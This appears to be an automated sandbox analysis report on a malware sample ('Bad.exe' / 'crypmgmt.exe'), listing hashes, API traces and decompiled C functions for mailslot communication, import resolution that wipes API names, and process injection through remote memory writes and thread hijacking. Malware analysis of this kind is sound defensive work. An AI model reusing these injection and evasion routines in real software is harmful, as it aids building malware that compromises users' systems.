Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 66839

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	B58623B61A3D254FB9FF47FF0A4A74C6
Total matches:	32
Initial Analysis Report:	Open
Initial sample Analysis ID:	66839
Initial sample SHA 256:	20CE262F54448C1424662B74706D81FAB421EB8F550C39A18CDB89DD9F15CB07
Initial sample name:	Bad.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
